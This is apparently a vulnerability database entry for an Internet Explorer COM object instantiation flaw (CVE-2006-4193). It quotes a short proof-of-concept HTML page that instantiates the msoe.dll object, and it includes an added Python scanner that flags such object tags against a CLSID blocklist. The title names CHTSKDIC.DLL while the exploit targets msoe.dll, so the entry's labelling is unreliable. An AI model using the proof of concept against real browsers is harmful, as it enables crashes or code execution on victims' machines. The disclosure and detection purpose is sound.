Microsoft IE CHTSKDIC.DLL Arbitrary Code Execution Vulnerability (MS07-027)

Vulnerability ID: 1110824    Vulnerability type: Other
Published: 2006-08-15    Updated: 2006-08-24
CVE ID: CVE-2006-4193    CNNVD-ID: CNNVD-200608-259
Platform: Windows    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/28389
https://cxsecurity.com/issue/WLB-2006080111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-259
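|Vulnerability details
Internet Explorer is a very popular web browser released by Microsoft. When Internet Explorer attempts to instantiate the CHTSKDIC.DLL (Microsoft IME) COM object as an ActiveX control, it may corrupt system memory, leading to denial of service or arbitrary code execution.
|Vulnerability exploit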
source: http://www.securityfocus.com/bid/19530/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. 

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.

 <!--
 // Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
 // tested: 2000SP4/XPSP2 CN

 // http://www.xsec.org
 // nop (nop#xsec.org)

 // CLSID: {233A9694-667E-11d1-9DFB-006097D50408}
 // Info: Outlook Express Address Book
 // ProgID: OutlookExpress.AddressBook.1
 // InprocServer32: %ProgramFiles%\Outlook Express\msoe.dll

 -->
 <html><body>
 <object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
 </body></html>
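
An added detection example, not part of the original advisory or the proof-of-concept: it parses HTML and reports `<object>` tags whose `classid` matches a blocklist, seeded here with the CLSID shown above. The function names, the blocklist contents and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID taken from the proof-of-concept above (msoe.dll, Outlook Express Address Book).
# The set is illustrative; extend it from the advisories you track.
BLOCKED_CLSIDS = {"233A9694-667E-11D1-9DFB-006097D50408"}

_CLSID_RE = re.compile(
    r"^\s*clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?\s*$",
    re.IGNORECASE,
)

def normalize_classid(value):
    """Return the bare upper-case GUID from a classid attribute, or None."""
    m = _CLSID_RE.match(value or "")
    return m.group(1).upper() if m else None

class ObjectTagScanner(HTMLParser):
    """Collects (line, clsid) for every <object> whose classid is blocked."""

    def __init__(self, blocked):
        super().__init__(convert_charrefs=True)
        self.blocked = blocked
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and skips comments.
        if tag != "object":
            return
        clsid = normalize_classid(dict(attrs).get("classid"))
        if clsid in self.blocked:
            self.hits.append((self.getpos()[0], clsid))

def scan_html(html, blocked=BLOCKED_CLSIDS):
    """Return a list of (line_number, clsid) for blocked <object> tags."""
    scanner = ObjectTagScanner(blocked)
    scanner.feed(html)
    scanner.close()
    return scanner.hits

# Constructed sample: a commented-out tag, two spellings of the blocked CLSID,
# and one unrelated CLSID that must not be reported.
SAMPLE = """<html><body>
<!-- <object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}"></object> -->
<object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
<OBJECT CLASSID='clsid:233a9694-667e-11d1-9dfb-006097d50408'></OBJECT>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"></object>
</body></html>"""

if __name__ == "__main__":
    for line, clsid in scan_html(SAMPLE):
        print(f"line {line}: blocked CLSID {clsid}")
```

The same function can be run over proxy-cached pages or mail attachments to flag content that instantiates a listed COM object.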
|References

Source: MISC
Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=9
Source: MISC
Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=8
Source: MISC
Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=10
Source: BID
Name: 19530
Link: http://www.securityfocus.com/bid/19530
Source: BID
Name: 19529
Link: http://www.securityfocus.com/bid/19529
Source: BID
Name: 19521
Link: http://www.securityfocus.com/bid/19521
Source: BUGTRAQ
Name: 20060815 [XSec-06-04]: Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443299/100/0/threaded
Source: BUGTRAQ
Name: 20060815 [XSec-06-03]: Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443295/100/0/threaded
Source: BUGTRAQ
Name: 20060815 [XSec-06-02]: Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443290/100/0/threaded
Source: XF
Name: ie-msoe-dos (28439)
Link: http://xforce.iss.net/xforce/xfdb/28439